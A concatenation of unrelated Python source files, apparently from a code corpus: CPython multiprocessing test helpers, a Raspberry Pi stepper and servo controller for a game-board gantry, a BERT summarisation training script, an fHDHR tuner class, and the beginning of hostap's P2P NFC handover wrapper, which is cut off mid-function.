def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
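# Generate one concrete TestCase per allowed type by combining the base
# class with the matching mixin, e.g. _TestQueue + 'processes' becomes
# WithProcessesTestQueue.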
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warnings about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
stepper_controller.py
|
import pigpio
import time
import threading
import math
pi = pigpio.pi()
gpio_pin_lst = (14, 15, 18, 23, 24, 25, 8, 16, 20)
DIR_PIN1, STEP_PIN1, DIR_PIN2, STEP_PIN2, M2, M1, M0, GRAB_SERVO, MAG_SERVO = gpio_pin_lst
for pin in gpio_pin_lst:
pi.set_mode(pin, pigpio.OUTPUT)
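# Microstep mode select pins; M0=1, M1=0, M2=0 corresponds to half-step
# mode on a DRV8825-style driver (the exact driver board is an assumption).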
pi.write(M0, 1)
pi.write(M1, 0)
pi.write(M2, 0)
# Gantry calibration (stepper steps)
home_distance = 950          # offset from home to the first board row (y axis)
side_distance = 120          # offset from home to the first board column (x axis)
square_side = 374            # steps between centres of adjacent board squares
# Servo calibration (pulse widths in microseconds)
magnet_up = 1100
magnet_down = 810
grabber_up = 1650
grabber_down_normal = 1025
grabber_down_king = 1115     # lowered position used for king (stacked) pieces
class Stepper:
def __init__(self, step_pin, dir_pin):
self.coord = 0
self.step_pin = step_pin
self.dir_pin = dir_pin
self.velocity = 0
def move(self, coord):
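# Trapezoidal motion profile: ramp up over ~100 steps, run the remaining
# distance at constant speed, then ramp down over ~70 steps. Moves too
# short for the full ramp are split into half acceleration and half
# deceleration instead.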
travel = coord - self.coord
if travel != 0:
accel_travel = int((travel/abs(travel)))*100
decel_travel = int((travel/abs(travel)))*70
linear_travel = travel - accel_travel - decel_travel
direction = self.coord < coord
if (linear_travel < 0) == (travel < 0):
self.accelerate(accel_travel)
for i in range(abs(linear_travel)):
self.step(direction)
self.decelerate(decel_travel)
else:
small_acceleration = int(travel/2)
small_decel = travel - small_acceleration
self.accelerate(small_acceleration)
self.decelerate(small_decel)
def step(self, dir_positive):
if dir_positive:
pi.write(self.dir_pin, 1)
self.coord += 1
else:
pi.write(self.dir_pin, 0)
self.coord -= 1
pi.write(self.step_pin, 1)
time.sleep(0.001)
pi.write(self.step_pin, 0)
def accelerate(self, steps):
current_steps = abs(steps)
steps_amount = abs(steps)
interval = 0.001
while current_steps > 0:
time.sleep((current_steps/steps_amount)**(1/4)*interval)
self.step(steps > 0)
current_steps -= 1
def decelerate(self, steps):
current_steps = 0
interval = 0.001
while current_steps < abs(steps):
time.sleep(math.sqrt(current_steps/abs(steps))*interval)
self.step(steps > 0)
current_steps += 1
tst_stepper1 = Stepper(STEP_PIN1, DIR_PIN1)
tst_stepper2 = Stepper(STEP_PIN2, DIR_PIN2)
def move_to(x, y):
t1 = threading.Thread(target=tst_stepper1.move, args=(side_distance+square_side*(x-1),))
t2 = threading.Thread(target=tst_stepper2.move, args=(home_distance+square_side*(y-1),))
t1.start()
t2.start()
t1.join()
t2.join()
def move_home():
t1 = threading.Thread(target=tst_stepper1.move, args=(0,))
t2 = threading.Thread(target=tst_stepper2.move, args=(0,))
t1.start()
t2.start()
t1.join()
t2.join()
def grabber_lower(king=False):
if king:
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_king)
else:
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_normal)
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def grabber_lower_with_height(pieces):
piece_height = 80
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_normal + piece_height*(pieces-1))
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def grabber_elevate():
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_up)
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def magnet_lower():
pi.set_servo_pulsewidth(MAG_SERVO, magnet_down)
time.sleep(0.2)
pi.set_servo_pulsewidth(MAG_SERVO, 0)
def magnet_elevate():
pi.set_servo_pulsewidth(MAG_SERVO, magnet_up)
time.sleep(0.2)
pi.set_servo_pulsewidth(MAG_SERVO, 0)
def grabber_grab(king=False):
grabber_lower(king)
magnet_lower()
grabber_elevate()
def grabber_drop(king=False):
grabber_lower(king)
magnet_elevate()
grabber_elevate()
grabber_elevate()
magnet_elevate()
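# Minimal usage sketch (not part of the original controller). It assumes
# the gantry is physically at its home position on start-up, since the
# Stepper coordinates above are tracked purely in software, and that board
# squares are addressed with 1-based (x, y) coordinates as in move_to().
if __name__ == "__main__":
    move_to(3, 3)     # travel to board square (3, 3)
    grabber_grab()    # pick up the piece at the current square
    move_to(4, 4)     # carry it one square diagonally
    grabber_drop()    # set the piece down
    move_home()       # park the gantry back at the home position
    pi.stop()         # release the pigpio connection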
|
train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
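# Usage sketch for str2bool (the flag name below is only an example; the
# real option definitions live in the project's argument parser). It lets
# a boolean option accept yes/no/true/false/0/1 on the command line:
#
#   parser.add_argument("-use_interval", type=str2bool, nargs="?",
#                       const=True, default=True)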
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
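# No explicit test_all run: watch model_path and validate/test each new
# checkpoint as soon as it has been fully written.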
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
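# Note: this module only defines the training/validation/test routines; the
# command-line entry point that builds the full "args" namespace (model
# hyper-parameters, data paths, optimizer settings, ...) lives elsewhere in
# the repository. A launcher would typically call train_abs(args, device_id)
# for training, validate_abs(args, device_id) to sweep checkpoints, or
# test_abs(args, device_id, checkpoint_path, step) for decoding; the exact
# flag names beyond those read above are not reproduced here.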
|
tuner.py
|
import threading
import datetime
from fHDHR.exceptions import TunerError
from fHDHR.tools import humanized_time
from .stream import Stream
class Tuner():
def __init__(self, fhdhr, inum, epg, origin):
self.fhdhr = fhdhr
self.number = inum
self.origin = origin
self.epg = epg
self.tuner_lock = threading.Lock()
self.set_off_status()
self.chanscan_url = "/api/channels?method=scan"
self.close_url = "/api/tuners?method=close&tuner=%s&origin=%s" % (self.number, self.origin)
def channel_scan(self, origin, grabbed=False):
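# Run a channel scan on a background thread; raises TunerError when this
# tuner is already locked and was not pre-grabbed by the caller.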
if self.tuner_lock.locked() and not grabbed:
self.fhdhr.logger.error("%s Tuner #%s is not available." % (self.origin, self.number))
raise TunerError("804 - Tuner In Use")
if self.status["status"] == "Scanning":
self.fhdhr.logger.info("Channel Scan Already In Progress!")
else:
if not grabbed:
self.tuner_lock.acquire()
self.status["status"] = "Scanning"
self.status["origin"] = origin
self.status["time_start"] = datetime.datetime.utcnow()
self.fhdhr.logger.info("Tuner #%s Performing Channel Scan for %s origin." % (self.number, origin))
chanscan = threading.Thread(target=self.runscan, args=(origin,))
chanscan.start()
def runscan(self, origin):
self.fhdhr.api.get("%s&origin=%s" % (self.chanscan_url, origin))
self.fhdhr.logger.info("Requested Channel Scan for %s origin Complete." % origin)
self.close()
self.fhdhr.api.get(self.close_url)
def add_downloaded_size(self, bytes_count):
if "downloaded" in list(self.status.keys()):
self.status["downloaded"] += bytes_count
def grab(self, origin, channel_number):
if self.tuner_lock.locked():
self.fhdhr.logger.error("Tuner #%s is not available." % self.number)
raise TunerError("804 - Tuner In Use")
self.tuner_lock.acquire()
self.status["status"] = "Acquired"
self.status["origin"] = origin
self.status["channel"] = channel_number
self.status["time_start"] = datetime.datetime.utcnow()
self.fhdhr.logger.info("Tuner #%s Acquired." % str(self.number))
def close(self):
self.set_off_status()
if self.tuner_lock.locked():
self.tuner_lock.release()
self.fhdhr.logger.info("Tuner #%s Released." % self.number)
def get_status(self):
current_status = self.status.copy()
current_status["epg"] = {}
if current_status["status"] in ["Acquired", "Active", "Scanning"]:
current_status["running_time"] = str(
humanized_time(
int((datetime.datetime.utcnow() - current_status["time_start"]).total_seconds())))
current_status["time_start"] = str(current_status["time_start"])
if current_status["status"] in ["Active"]:
if current_status["origin"] in self.epg.epg_methods:
current_status["epg"] = self.epg.whats_on_now(current_status["channel"], method=current_status["origin"])
return current_status
def set_off_status(self):
self.status = {"status": "Inactive"}
def get_stream(self, stream_args, tuner):
stream = Stream(self.fhdhr, stream_args, tuner)
return stream.get()
def set_status(self, stream_args):
if self.status["status"] != "Active":
self.status = {
"status": "Active",
"clients": [],
"clients_id": [],
"method": stream_args["method"],
"accessed": [stream_args["accessed"]],
"origin": stream_args["origin"],
"channel": stream_args["channel"],
"proxied_url": stream_args["stream_info"]["url"],
"time_start": datetime.datetime.utcnow(),
"downloaded": 0
}
if stream_args["client"] not in self.status["clients"]:
self.status["clients"].append(stream_args["client"])
if stream_args["client_id"] not in self.status["clients_id"]:
self.status["clients_id"].append(stream_args["client_id"])
|
p2p-nfc.py
|
#!/usr/bin/python
#
# Example nfcpy to wpa_supplicant wrapper for P2P NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import random
import threading
import argparse
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import logging
import wpaspy
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None
init_on_touch = False
in_raw_mode = False
prev_tcgetattr = 0
include_wps_req = True
include_p2p_req = True
no_input = False
srv = None
continue_loop = True
terminate_now = False
summary_file = None
success_file = None
def summary(txt):
print txt
if summary_file:
with open(summary_file, 'a') as f:
f.write(txt + "\n")
def success_report(txt):
summary(txt)
if success_file:
with open(success_file, 'a') as f:
f.write(txt + "\n")
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError, error:
print "Could not find wpa_supplicant: ", error
return None
if len(ifaces) < 1:
print "No wpa_supplicant control interface found"
return None
for ctrl in ifaces:
if ifname:
if ifname not in ctrl:
continue
try:
print "Trying to use control interface " + ctrl
wpas = wpaspy.Ctrl(ctrl)
return wpas
except Exception, e:
pass
return None
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return False
cmd = "WPS_NFC_TAG_READ " + str(message).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
if "FAIL" in wpas.request(cmd):
return False
return True
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_req_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel(tag=False):
wpas = wpas_connect()
if (wpas == None):
return None
if tag:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR-TAG").rstrip()
else:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF WPS-CR");
if "FAIL" in res:
return None
return res.rstrip().decode("hex")
def wpas_report_handover(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " P2P " + str(req).encode("hex") + " " + str(sel).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def wpas_report_handover_wsc(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " WPS " + str(req).encode("hex") + " " + str(sel).encode("hex")
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def p2p_handover_client(llc):
message = nfc.ndef.HandoverRequestMessage(version="1.2")
message.nonce = random.randint(0, 0xffff)
global include_p2p_req
if include_p2p_req:
data = wpas_get_handover_req()
if (data == None):
summary("Could not get handover request carrier record from wpa_supplicant")
return
print "Handover request carrier record from wpa_supplicant: " + data.encode("hex")
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
global include_wps_req
if include_wps_req:
print "Handover request (pre-WPS):"
try:
print message.pretty()
except Exception, e:
print e
data = wpas_get_handover_req_wps()
if data:
print "Add WPS request in addition to P2P"
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
print "Handover request:"
try:
print message.pretty()
except Exception, e:
print e
print str(message).encode("hex")
client = nfc.handover.HandoverClient(llc)
try:
summary("Trying to initiate NFC connection handover")
client.connect()
summary("Connected for handover")
except nfc.llcp.ConnectRefused:
summary("Handover connection refused")
client.close()
return
except Exception, e:
summary("Other exception: " + str(e))
client.close()
return
summary("Sending handover request")
if not client.send(message):
summary("Failed to send handover request")
client.close()
return
summary("Receiving handover response")
message = client._recv()
if message is None:
summary("No response received")
client.close()
return
if message.type != "urn:nfc:wkt:Hs":
summary("Response was not Hs - received: " + message.type)
client.close()
return
print "Received message"
try:
print message.pretty()
except Exception, e:
print e
print str(message).encode("hex")
message = nfc.ndef.HandoverSelectMessage(message)
summary("Handover select received")
try:
print message.pretty()
except Exception, e:
print e
for carrier in message.carriers:
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.p2p":
print "P2P carrier type match - send to wpa_supplicant"
if "OK" in wpas_report_handover(data, carrier.record, "INIT"):
success_report("P2P handover reported successfully (initiator)")
else:
summary("P2P handover report rejected")
break
print "Remove peer"
client.close()
print "Done with handover"
global only_one
if only_one:
print "only_one -> stop loop"
global continue_loop
continue_loop = False
global no_wait
if no_wait:
print "Trying to exit.."
global terminate_now
terminate_now = True
class HandoverServer(nfc.handover.HandoverServer):
def __init__(self, llc):
super(HandoverServer, self).__init__(llc)
self.sent_carrier = None
self.ho_server_processing = False
self.success = False
# override to avoid parser error in request/response.pretty() in nfcpy
# due to new WSC handover format
def _process_request(self, request):
summary("received handover request {}".format(request.type))
response = nfc.ndef.Message("\xd1\x02\x01Hs\x12")
if not request.type == 'urn:nfc:wkt:Hr':
